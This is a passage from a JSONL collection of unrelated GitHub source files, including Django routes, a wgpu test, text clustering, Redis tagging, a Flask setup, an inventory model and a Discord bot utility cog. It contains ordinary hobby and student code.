views.myupload, name='myupload'),\n url(r'^myinvest/(?P\\d+)/$', views.myinvest, name='myinvest'),\n\n url(r'^token/$', views.token, name='token'),\n url(r'^callback/$', views.callback, name='callback'),\n url(r'^delvideo/$', views.delvideo, name='delvideo'),\n url(r'^ismyproject/(?P[1-9]\\d*)/$', views.ismyproject, name='ismyproject'),\n url(r'^valsession/$', views.valsession, name='valsession'),\n url(r'^checkupdate/(?P[12])/$', 
views.checkupdate, name='checkupdate'),\n url(r'^shareproject/(?P[1-9]\\d*)/$', views.shareproject, name='shareproject'),\n url(r'^shareapp/$', views.shareapp, name='shareapp'),\n\n url(r'^aboutroadshow', views.aboutroadshow, name='aboutroadshow'),\n url(r'^risk/$', views.risk, name='risk'),\n url(r'^useragreement/$', views.useragreement, name='useragreement'),\n url(r'^projectprotocol/$', views.projectprotocol, name='projectprotocol'),\n url(r'^crowfunding/$', views.crowfunding, name='crowfunding'),\n url(r'^leadfunding/$', views.leadfunding, name='leadfunding'),\n url(r'^privacy/$', views.privacy, name='privacy'),\n\n url(r'^topic/(?P[1-9]\\d*)/$', views.topic, name='topic'),\n url(r'^topiclist/(?P[1-9]\\d*)/(?P\\d+)/$', views.topiclist, name='topiclist'),\n url(r'^mytopiclist/(?P\\d+)/$', views.mytopiclist, name='mytopiclist'),\n url(r'^readtopic/(?P\\d+)/$', views.readtopic, name='readtopic'),\n\n url(r'^latestnewscount/$', views.latestnewscount, name='latestnewscount'),\n url(r'^getfeeling/(?P[1-9]\\d*)/$', views.getfeeling, name='getfeeling'),\n url(r'^postfeeling/$', views.postfeeling, name='postfeeling'),\n url(r'^deletefeeling/(?P[1-9]\\d*)/$', views.deletefeeling, name='deletefeeling'),\n url(r'^likefeeling/(?P[1-9]\\d*)/(?P[01])/$', views.likefeeling, name='likefeeling'),\n url(r'^feelinglikers/(?P[1-9]\\d*)/(?P\\d+)/$', views.feelinglikers, name='feelinglikers'),\n url(r'^feelingcomment/(?P[1-9]\\d*)/(?P\\d+)/$', views.feelingcomment, name='feelingcomment'),\n url(r'^postfeelingcomment/(?P[1-9]\\d*)/$', views.postfeelingcomment, name='postfeelingcomment'),\n url(r'^hidefeelingcomment/(?P[1-9]\\d*)/$', views.hidefeelingcomment, name='hidefeelingcomment'),\n url(r'^background/$', views.background, name='background'),\n]\n","repo_name":"lindyang/software1.0","sub_path":"phone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10132931269","text":"import ctypes\nfrom ctypes import Structure, c_float, c_uint32, c_uint16, sizeof, c_bool, c_int, c_void_p\nimport numpy as np\n\nfrom loguru import logger\n\nfrom crunge import wgpu\nfrom crunge.core import as_capsule\nfrom crunge.wgpu import BackendType\n\n\n\nindices = np.array([0, 1, 2, 3, 7, 1, 5, 0, 4, 2, 6, 7, 4, 5,], dtype=np.uint16)\ndata = as_capsule(indices)\n#size = len(indices) * sizeof(c_uint16)\nsize = indices.nbytes\nlogger.debug(size)\nusage = wgpu.BufferUsage.INDEX\n\ndef main():\n instance = wgpu.create_instance()\n adapter = instance.request_adapter()\n props = wgpu.AdapterProperties()\n adapter.get_properties(props)\n logger.debug(props.vendor_name)\n device = adapter.create_device()\n logger.debug(device)\n device.enable_logging()\n\n descriptor = wgpu.BufferDescriptor()\n descriptor.size = size\n descriptor.usage = usage | wgpu.BufferUsage.COPY_DST\n buffer: wgpu.Buffer = device.create_buffer(descriptor)\n\n device.queue.write_buffer(buffer, 0, data, size)\n\nif __name__ == \"__main__\":\n main()","repo_name":"crungelab/crunge","sub_path":"pkg/wgpu/tests/test_buffer.py","file_name":"test_buffer.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"15854397224","text":"#importing libraries\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport re\r\nimport nltk\r\n\r\n#import dataset\r\ndataset = pd.read_csv('news.csv')\r\n\r\nfrom nltk.corpus import 
stopwords\r\nfrom nltk.stem import SnowballStemmer\r\n\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nstop_words =set(stopwords.words('english'))\r\n\r\nheadline = dataset['headline']\r\ntext = dataset['text']\r\n#storing cleaned text reviews\r\ncleaned_text =[]\r\n#storing cleaned headline\r\ncleaned_headline = []\r\nfor j in range(len(headline)):\r\n #this is for the headline\r\n summary = headline[j]\r\n #this is for the text\r\n summary1 = text[j]\r\n #Cleaning the reviews using re, removing pos tags\r\n clnr = re.compile('<.*?>')\r\n summary = re.sub(clnr, ' ' , summary)\r\n summary1 = re.sub(clnr, ' ' , summary1)\r\n #Cleaning the reviews keeping only Alphabets\r\n clnr = re.compile('[^a-zA-Z]')\r\n summary = re.sub(clnr, ' ' , summary)\r\n summary1 = re.sub(clnr, ' ' , summary1)\r\n \r\n summary = summary.lower()\r\n summary1 = summary1.lower()\r\n \r\n summary = nltk.word_tokenize(summary)\r\n summary1 = nltk.word_tokenize(summary1)\r\n \r\n SS = SnowballStemmer('english')\r\n lmt = WordNetLemmatizer()\r\n \r\n summary = [SS.stem(i) for i in summary if not i in stop_words]\r\n summary = [lmt.lemmatize(i) for i in summary]\r\n \r\n summary = ' '.join(summary)\r\n \r\n summary1 = [SS.stem(i) for i in summary1 if not i in stop_words]\r\n \r\n summary1 = [lmt.lemmatize(i) for i in summary1]\r\n summary1 = ' '.join(summary)\r\n \r\n print(j , ' done..')\r\n cleaned_headline.append(summary1)\r\n cleaned_text.append(summary)\r\n\r\n#tf-idf vectorization\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nvectorise = TfidfVectorizer(use_idf=True)\r\nvectorizer = vectorise.fit_transform(cleaned_text,cleaned_headline).toarray()\r\n\r\n#Scaling the vector\r\nfrom sklearn.preprocessing import StandardScaler\r\nss = StandardScaler()\r\ndata = ss.fit_transform(vectorizer)\r\n\r\n#Reducing the dimensions to avoid overfit\r\nfrom sklearn.decomposition import PCA\r\npca = PCA (n_components = 2)\r\nx = pca.fit_transform(data)\r\n\r\n#elbow method kmeans\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics import silhouette_score\r\n\r\nwcss=[]\r\nfor i in range(1,10):\r\n kmeans = KMeans(n_clusters= i ,init = 'k-means++')\r\n preds = kmeans.fit_predict(x)\r\n center = kmeans.cluster_centers_\r\n #score = silhouette_score(data ,preds )\r\n wcss.append(kmeans.inertia_)\r\n print(i, ' done..' 
)\r\n \r\nplt.plot(range(1,10) , wcss)\r\nplt.xlabel('no of clusters')\r\nplt.ylabel('distances')\r\nplt.show()\r\n\r\n#Predicting the clusters based on data \r\nclusters = 3\r\nkmeans = KMeans(random_state = 0,n_clusters=clusters ,init = 'k-means++' , max_iter =300 , n_init=10)\r\npred = kmeans.fit_predict(x)\r\n\r\nout = []\r\nfor i in range(3000):\r\n Y = vectorise.transform(text) \r\n pred = kmeans.predict(Y)\r\n out.append(pred)\r\n\r\nuid = ['uid-'+str(i+1) for i in range(3000)]\r\ndf = pd.DataFrame()\r\ndf['id'] = uid\r\ndf['cluster'] = out\r\n\r\ndf.to_csv('output.csv')\r\nnp.savetxt('output.txt', vectorizer.todense())\r\n ","repo_name":"enigmarikki/Clustering-of-financial-articles","sub_path":"Clustering.py","file_name":"Clustering.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39012300567","text":"from src.parser import *\nimport pytest\n\n\ndef test_pass_maintainer():\n expected = { \"Name\": \"Test Name\", \"Email\": \"test.name@test.com\"}\n assert expected == parse_maintainer(\"Test Name \")\n\n@pytest.mark.parametrize(\"package_list\", [\n (\n \"test_package (>= 5.0)\", \n [{\"Name\": \"test_package\", \"Version\": \">= 5.0\"}]\n ),( \n \"libc6 (>= 2.4), libwrap0 (>= 7.6-4~)\",\n [\n {\"Name\": \"libc6\", \"Version\": \">= 2.4\"},\n {\"Name\": \"libwrap0\", \"Version\": \">= 7.6-4~\"}\n ]\n ),(\n \"junit (>= 3.8.2), libplexus-cipher-java\",\n [\n {\"Name\": \"junit\", \"Version\": \">= 3.8.2\"},\n {\"Name\": \"libplexus-cipher-java\"}\n ]\n\n )\n])\n\ndef test_parse_package_list(package_list):\n assert parse_package_list(package_list[0]) == package_list[1]\n\n@pytest.mark.parametrize(\"input\", [\n (\n \"Depends: test_package (>= 5.0)\", \n {\"Depends\": [{\"Name\": \"test_package\", \"Version\": \">= 5.0\"}]}\n ),( \n \"Depends: libc6 (>= 2.4), libwrap0 (>= 7.6-4~)\",\n {\"Depends\":\n [\n {\"Name\": \"libc6\", \"Version\": \">= 2.4\"},\n {\"Name\": \"libwrap0\", \"Version\": \">= 7.6-4~\"}\n ]\n }\n ),(\n \"Depends: junit (>= 3.8.2), libplexus-cipher-java\",\n {\"Depends\":\n [\n {\"Name\": \"junit\", \"Version\": \">= 3.8.2\"},\n {\"Name\": \"libplexus-cipher-java\"}\n ]\n }\n\n )\n])\n\ndef test_key_val_pair(input):\n assert parse_key_val_pair(input[0]) == input[1]","repo_name":"eetu-n/package_visualiser","sub_path":"backend/test/parser_test.py","file_name":"parser_test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40900769338","text":"\"\"\" models for app\"\"\"\nfrom repository import JsonRepository\n######Input Divace##########\nclass InputDevice:\n \"\"\"Input device class\"\"\"\n def __init__(self, name, brand):\n self.name = name\n self.brand = brand\n self.repository = JsonRepository()\n\nclass Mouse(InputDevice):\n \"\"\"Mouse class\"\"\"\n def __init__(self, name, brand ):\n super().__init__(name, brand)\n self.id = 0;\n self.units = 0;\n\n def save_mouse(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_mouse(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n 
\"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_mouse(self):\n return self.repository.list()\n \n def delete_mouse(self):\n data = {\n \"id\": self.id,\n }\n self.repository.delete(data)\n \n def search_mouse(self):\n data = {\n \"id\": self.id,\n }\n return self.repository.search(data)\n \n \nclass keyboard(InputDevice):\n \"\"\"Keyboard class\"\"\"\n def __init__(self, name, brand):\n super().__init__(name, brand)\n self.id = 0;\n self.units = 0;\n \n def save_keyboard(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_keyboard(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_keyboard(self):\n return self.repository.list()\n \n def delete_keyboard(self):\n data = {\n \"id\": self.id\n }\n self.repository.delete(data)\n \n def search_keyboard(self, data):\n data = {\n \"id\": self.id\n }\n return self.repository.search(data)\n \n#########Output Divace###### \nclass OutputDevice: \n \"\"\"Output device class\"\"\"\n def __init__(self, name, brand):\n self.name = name\n self.brand = brand\n self.repository = JsonRepository() \n\nclass Monitor(OutputDevice):\n \"\"\"Monitor class\"\"\"\n def __init__(self, name, brand):\n super().__init__(name,brand)\n self.id = 0;\n self.units = 0;\n\n def save_monitor(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_monitor(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_monitor(self):\n return self.repository.list()\n \n def delete_monitor(self):\n data = {\n \"id\": self.id,\n }\n self.repository.delete(data)\n \n def search_monitor(self):\n data = {\n \"id\": self.id,\n }\n return self.repository.search(data)\n \nclass Speaker(OutputDevice):\n \"\"\"Speaker class\"\"\"\n def __init__(self, name, brand):\n super().__init__(name,brand)\n self.id = 0;\n self.units = 0;\n \n def save_speaker(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_speaker(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_speaker(self):\n return 
self.repository.list()\n \n def delete_speaker(self):\n data = {\n \"id\" : self.id\n }\n self.repository.delete(data)\n \n def search_speaker(self):\n data = {\n \"id\":self.id,\n }\n return self.repository.search(data) \n\nclass Computer:\n def __init__(self, name, brand, mouse, keyboard, monitor, speaker):\n self.name = name\n self.brand = brand\n self.mouse = mouse\n self.keyboard = keyboard\n self.monitor = monitor\n self.speaker = speaker\n self.id = 0\n self.units = 0\n self.repository = JsonRepository()\n \n def save_computer(self):\n data = {\n \"name\": self.name,\n \"brand\": self.brand,\n \"mouse\": {\n \"name\": self.mouse.name,\n \"brand\": self.mouse.brand,\n \"id\": self.mouse.id,\n \"units\": self.mouse.units\n },\n \"keyboard\":{\n \"name\": self.keyboard.name,\n \"brand\": self.keyboard.brand,\n \"id\": self.keyboard.id,\n \"units\": self.keyboard.units\n },\n \"monitor\":{\n \"name\": self.monitor.name,\n \"brand\": self.monitor.brand,\n \"id\": self.monitor.id,\n \"units\": self.monitor.units\n },\n \"speaker\":{\n \"name\": self.speaker.name,\n \"brand\": self.speaker.brand,\n \"id\": self.speaker.id,\n \"units\": self.speaker.units\n },\n \"id\": self.id,\n \"units\": self.units\n \n }\n return self.repository.add(data)\n def update_computer(self, new_name=None, new_brand=None, new_mouse=None, new_keyboard=None, new_monitor=None, new_speaker=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand,\n \"mouse\": {\n \"name\": self.mouse.name,\n \"brand\": self.mouse.brand,\n \"id\": self.mouse.id,\n \"units\": self.mouse.units\n },\n \"keyboard\": {\n \"name\": self.keyboard.name if self.keyboard else None,\n \"brand\": self.keyboard.brand if self.keyboard else None,\n \"id\": self.keyboard.id if self.keyboard else None,\n \"units\": self.keyboard.units if self.keyboard else None\n },\n \"monitor\": {\n \"name\": self.monitor.name if self.monitor else None,\n \"brand\": self.monitor.brand if self.monitor else None,\n \"id\": self.monitor.id if self.monitor else None,\n \"units\": self.monitor.units if self.monitor else None\n },\n \"speaker\": {\n \"name\": self.speaker.name if self.speaker else None,\n \"brand\": self.speaker.brand if self.speaker else None,\n \"id\": self.speaker.id if self.speaker else None,\n \"units\": self.speaker.units if self.speaker else None\n },\n \"units\": self.units\n \n }\n\n if new_name:\n old_data[\"name\"] = new_name\n if new_brand:\n old_data[\"brand\"] = new_brand\n if new_mouse:\n old_data[\"mouse\"] = {\n \"name\": new_mouse.name,\n \"brand\": new_mouse.brand,\n \"id\": new_mouse.id,\n \"units\": new_mouse.units\n }\n if new_keyboard:\n old_data[\"keyboard\"] = {\n \"name\": new_keyboard.name,\n \"brand\": new_keyboard.brand,\n \"id\": new_keyboard.id,\n \"units\": new_keyboard.units\n }\n if new_monitor:\n old_data[\"monitor\"] = {\n \"name\": new_monitor.name,\n \"brand\": new_monitor.brand,\n \"id\": new_monitor.id,\n \"units\": new_monitor.units\n }\n if new_speaker:\n old_data[\"speaker\"] = {\n \"name\": new_speaker.name,\n \"brand\": new_speaker.brand,\n \"id\": new_speaker.id,\n \"units\": new_speaker.units\n }\n if new_units is not None:\n old_data[\"units\"] = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"mouse\": old_data[\"mouse\"],\n \"keyboard\": old_data[\"keyboard\"],\n \"monitor\": old_data[\"monitor\"],\n \"speaker\": old_data[\"speaker\"],\n \"units\" : old_data[\"units\"]\n \n }\n self.repository.update(old_data, new_data)\n \n def 
list_computer(self):\n return self.repository.list()\n \n def delete_computer(self):\n data = {\n \"id\": self.id\n }\n self.repository.delete(data)\n \n def search(self):\n data = {\n \"id\":self.id\n }\n return self.repository.search(data)","repo_name":"InforTech07/intership23.1-practica1","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"3103926346","text":"import tensorflow as tf\n\nfrom stable_baselines.a2c.utils import conv, linear, conv_to_fc\n\n\ndef tic_tac_toe_cnn(scaled_images, **kwargs):\n \"\"\"\n Custom CNN for Tic Tac Toe env.\n\n :param scaled_images: (TensorFlow Tensor) Image input placeholder\n :return: (TensorFlow Tensor) The CNN output layer\n \"\"\"\n activ = tf.nn.relu\n layer = scaled_images\n\n # print(kwargs)\n net_arch = kwargs['cnn_arch']\n filter_size = kwargs['filter_size']\n pad = kwargs['pad']\n\n for i, f in enumerate(net_arch[:-1], start=1):\n # print('c' + str(i), f)\n layer = activ(conv(layer, 'c' + str(i), n_filters=f, filter_size=filter_size,\n stride=1, pad=pad, data_format='NCHW'))\n\n layer = conv_to_fc(layer)\n\n # print('fc1', net_arch[-1])\n # print()\n return activ(linear(layer, 'fc1', n_hidden=net_arch[-1]))\n","repo_name":"mdaraujo/deep-rl-tictactoe","sub_path":"utils/cnn_extractor.py","file_name":"cnn_extractor.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"72417322556","text":"# coding=utf-8\nfrom redis_cache import get_redis_connection\n\n# Для справки, комманды редиса\n# http://redis.io/commands\n\n# лямбда-функция, которая возвращает ключ\n# где хранятся теги для чего-то\n# t - question, например\n# i - идентификатор вопроса\nkey = lambda t, i: u'{0}:{1}:tags'.format(t, i)\n\n# лямбда функция, которая возращает ключ для\n# множества, где хранятся id-шники вопросов\n# у которых есть тег name\ntag_key = lambda t, name: u'tag:{0}:{1}'.format(name, t)\n\n# все теги, их не так много, храним в одном сортированном\n# множестве, где счет у каждого элемента - сколько он раз\n# заюзан в вопросах\nkey_all_tags = 'tags:all'\n\n\ndef get_tags(prefix, tagged_id):\n r = get_redis_connection()\n # smembers возвращает все элементы множества\n # по ключу\n return r.smembers(key(prefix, tagged_id))\n\n\ndef get_top(max_tags=10, offset=0):\n r = get_redis_connection()\n # zrevrage возвращает из упорядоченного множества\n # первые max_tags тегов начиная с offset\n # значения отсортированы (в данном случае по кол-ву вопросов\n # в которых они использованы)\n return r.zrevrange(key_all_tags, offset, max_tags)\n\n\ndef get_models(prefix, tag):\n \"\"\"\n Возвращает id-шники элементов с тегом tag\n Например все вопросы, у которых есть какой-то тег\n \"\"\"\n r = get_redis_connection()\n return r.smembers(tag_key(prefix, tag))\n\n\ndef add_tag(prefix, tagged_id, tag):\n if tag.strip() == '':\n return\n\n r = get_redis_connection()\n # ZINCRBY увеличивает \"счет\" тега, в данном случае на 1\n r.execute_command('ZINCRBY', key_all_tags, 1, tag)\n\n # добавляем тег к вопросу и id-шник вопроса к тегу\n r.sadd(key(prefix, tagged_id), tag)\n r.sadd(tag_key(prefix, tag), tagged_id)\n\n\ndef add_tags(prefix, tagged_id, tags):\n # тут просто добавляем сразу много тегов\n r = get_redis_connection()\n for t in tags:\n if t.strip() == '':\n continue\n r.execute_command('ZINCRBY', key_all_tags, 1, t)\n r.sadd(key(prefix, 
tagged_id), t)\n r.sadd(tag_key(prefix, t), tagged_id)\n\n\ndef get_tag_count(tag):\n r = get_redis_connection()\n # zscore возвращает счет тега\n return r.zscore(key_all_tags, tag)\n\n\ndef remove_tag(prefix, tagged_id, tag):\n r = get_redis_connection()\n r.execute_command('ZINCRBY', key_all_tags, -1, tag)\n r.srem(key(prefix, tagged_id), tag)\n r.srem(tag_key(prefix, tag), tagged_id)\n\n\ndef get_all_tags():\n r = get_redis_connection()\n return r.zrevrange(key_all_tags, 0, -1)\n\n\ndef get_starts(startswith):\n # а тут для автокомплита\n r = get_redis_connection()\n # zscan ищет по wildcard-у элемент\n\n data = r.execute_command('ZSCAN', key_all_tags, 0, 'match', u'{0}*'.format(startswith))\n result = []\n tags = data[1]\n if len(tags) == 0:\n return None\n count = len(tags)\n for i in range(0, count, 2):\n result.append(tags[i])\n return result\n\n\n","repo_name":"LifeMoroz/faq","sub_path":"tagging/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1848333926","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import path # operating system provides the directory\nfrom flask_login import LoginManager\n\ndb = SQLAlchemy()\nDB_NAME = \"faceLogin.db\"\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'Microsoft engage project'\n app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{DB_NAME}'\n db.init_app(app) # initialise database\n\n from .views import views\n from .auth import auth\n\n app.register_blueprint(views, url_prefix='/')\n app.register_blueprint(auth, url_prefix='/')\n\n from . import models\n from .models import User\n\n create_database(app)\n\n login_manager = LoginManager()\n login_manager.login_view = 'auth.login' # where the user will be redirected if they're not logged in yet\n login_manager.init_app(app)\n\n @login_manager.user_loader\n def load_user(id):\n return User.query.get(int(id)) # filter by, ckecks fro primary key id\n\n return app\n\n\ndef create_database(app):\n if not path.exists('website/' + DB_NAME): # if doesn't already exist, create\n db.create_all(app=app)\n print('Created Database!')\n","repo_name":"Archana00N/Authy-FaceDetection","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10479839145","text":"from reclibwh.utils.ItemMetadata import ExplicitDataFromCSV, ExplicitDataFromPostgres\nimport numpy as np\n\nif __name__==\"__main__\":\n \n data_folder = '/home/ong/personal/recommender/data/ml-20m-2'\n postgres_config='/home/ong/personal/recommender/reclibwh/apps/gcp.postgres.config'\n\n dcsv = ExplicitDataFromCSV(True, data_folder=data_folder)\n dsql = ExplicitDataFromPostgres(\n postgres_config,\n rt='backend_rating', rt_user_col='user_id', rt_item_fk_col='film_id', rt_rating_col='rating',\n it='backend_film', it_item_id_col='dataset_id', it_item_mean_col='mean_rating', ut='auth_user', ut_id_col='id',\n user_offset=0\n ) \n\n md_df = dcsv.fetch_md(list(range(dcsv.M)))\n mean_ratings = dcsv.get_item_mean_ratings(np.arange(dcsv.M))\n md_df = md_df.merge(mean_ratings, left_index=True, right_index=True)\n \n print(len(md_df.index.unique()))\n print(len(md_df))\n\n dsql.add_items(\n **{\n 'item_ids': md_df.index,\n 'names': md_df['title'],\n 'desc': md_df['desc'],\n 'poster_path': md_df['poster_path'],\n 
'mean_rating': md_df['rating_item_mean']\n }\n )\n\n print(dsql.get_item_mean_ratings())\n ","repo_name":"whong92/recommender","sub_path":"reclibwh/scripts/csv2postgres.py","file_name":"csv2postgres.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"96"}
{"seq_id":"17879251684","text":"#You are given an array and a target sum, and you need to find contiguous array indices which result in the given sum. This is a greedy approach solution.\r\n#For example, arr = [1, 2, 3, 4, 5, 6, 7], target sum = 9, therefore, the contiguous array resulting in sum 9 will be [2, 3, 4] from indices 1 to 4(4 not included), therefore, the output should be 1, 4.\r\n#Test Cases to be kept in mind:-\r\n#1) Generic array, subarray occurring somewhere in between.\r\n#2) Subarray could be at the starting of the given array.\r\n#3) Subarray could be at the end of the given array.\r\n#4) There is no subarray resulting in the target sum.\r\n#5) You have a few zeros in the array/list.\r\n#6) There are multiple subarrays resulting in the same target sum.\r\n#7) The array is empty.\r\n#8) The subarray is a single element.\r\n#A bruteforce solution.\r\ndef subarray_sum(arr, target):\r\n n = len(arr)\r\n #i goes from 0 to n-1, iterating over the full array.\r\n for i in range(0, n):\r\n #j goes from i to n+1, because, in the j index, we also need to return the position of the first element which is not included; as in the range function, the last index is not included.\r\n for j in range(i, n+1):\r\n if sum(arr[i:j]) == target:\r\n return i, j\r\n return None, None\r\n#Time Complexity, T(N) = O(n^3)\r\n\r\n#Optimised solutions:-\r\n#1) Maintain a running sum for the inner loop\r\n#2) When the running sum exceeds the target sum, break the inner loop.\r\n\r\n#1) This solution keeps track of a running sum, and at the place where the running sum becomes equal to the target sum, we simply return the indices.\r\ndef subarray_sum1(arr, target):\r\n n = len(arr)\r\n for i in range(0, n):\r\n s = 0 #running sum\r\n for j in range(i, n+1):\r\n if s == target:\r\n return i, j\r\n elif s > target:\r\n break\r\n if j < n: #This is done because the j loop is taking the n element as well.\r\n s = s + arr[j] #which means the sum is still less than the target sum.\r\n return None, None\r\n#Time Complexity, T(N) = O(n^2)\r\n\r\n#2)\r\ndef subarray_sum2(arr, target):\r\n n = len(arr)\r\n i, j, s = 0, 0, 0\r\n while j < n+1:\r\n if s == target:\r\n return i, j\r\n elif s < target:\r\n if j == n: #no elements are left to extend the window, so no subarray sums to the target.\r\n break\r\n s = s + arr[j] #keep incrementing j while keeping i the same.\r\n j = j+1\r\n else:\r\n s = s - arr[i] #The moment the sum becomes greater than the target sum, remove arr[i] from the sum, and increment i.\r\n i = i+1\r\n return None, None\r\n#Time Complexity, T(N) = O(N)","repo_name":"radhika-020/DSA","sub_path":"Interview_question.py","file_name":"Interview_question.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"5555239961","text":"import discord\r\nfrom discord.ext import commands\r\nimport math\r\n\r\nclass utility(commands.Cog):\r\n def __init__(self, bot, *args, **kwargs):\r\n self.bot = bot\r\n\r\n @commands.command()\r\n @commands.guild_only()\r\n async def invite(self, ctx):\r\n link = \"https://discord.gg/pXWwUhed3h\"\r\n embed = discord.Embed()\r\n embed.description = f\"Your invite is\\n\\n{link}\"\r\n await ctx.send(embed=embed)\r\n\r\n 
@commands.command(aliases=['latency', 'pong'])\r\n async def ping(self, ctx):\r\n await ctx.send(f\"Pong! My latency is {round(self.bot.latency*1000)} ms\")\r\n\r\n @commands.command(aliases=['userinfo'])\r\n async def whois(self, ctx, member: discord.Member=None):\r\n if not member:\r\n member = ctx.message.author\r\n roles = [role for role in member.roles]\r\n embed = discord.Embed(color=discord.Color.purple(),\r\n timestamp=ctx.message.created_at,\r\n title=f\"User info - {member}\")\r\n \r\n embed.set_thumbnail(url=member.avatar_url)\r\n embed.set_footer(text=f\"Requested by {ctx.author}\")\r\n\r\n embed.add_field(name=\"ID: \", value=member.id, inline=False)\r\n embed.add_field(name=\"Display Name: \", value=member.display_name, inline=False)\r\n\r\n embed.add_field(name=\"Created Account On: \", value=member.created_at.strftime(\"%a, %#d %B %Y, %I:%M %p UTC\"), inline=False)\r\n embed.add_field(name=\"Joined Server On: \", value=member.joined_at.strftime(\"%a, %#d %B %Y, %I:%M %p UTC\"), inline=False)\r\n\r\n embed.add_field(name=\"Roles: \", value=\" \".join([role.mention for role in roles]), inline=False)\r\n embed.add_field(name=\"Highest Role: \", value=member.top_role.mention, inline=False)\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command(aliases=['si'])\r\n async def serverinfo(self, ctx):\r\n embed = discord.Embed(\r\n color=discord.Color(0xffff),\r\n title=f\"{ctx.guild.name}\"\r\n )\r\n embed.set_thumbnail(url=ctx.guild.icon_url)\r\n embed.add_field(name=\"Region: \", value=f\"`{ctx.guild.region}`\")\r\n embed.add_field(name=\"Member Count: \", value=f\"{ctx.guild.member_count}\")\r\n embed.add_field(name=\"Owner: \", value=f\"{ctx.guild.owner}\")\r\n embed.add_field(name=\"Verification Level: \", value=f\"{ctx.guild.verification_level}\")\r\n embed.add_field(name=\"Content Filter: \", value=f\"{ctx.guild.explicit_content_filter}\")\r\n embed.add_field(name=\"Number of Boosts: \", value=f\"{ctx.guild.premium_subscription_count}\")\r\n embed.add_field(name=\"Premium Tier: \", value=f\"{ctx.guild.premium_tier}\")\r\n embed.set_footer(icon_url=f\"{ctx.guild.icon_url}\", text=f\"Guild ID: {ctx.guild.id}\")\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command()\r\n async def report(self, ctx, member: discord.Member, *, reason):\r\n # Context has no get_channel; look the reports channel up on the bot instead\r\n rchannel = self.bot.get_channel(738667684899717220)\r\n\r\n embed = discord.Embed(title=f\"New report\")\r\n embed.add_field(name=\"Reporter: \", value=f\"{ctx.author.mention}\")\r\n embed.add_field(name=\"Reportee: \", value=f\"{member.mention}\")\r\n 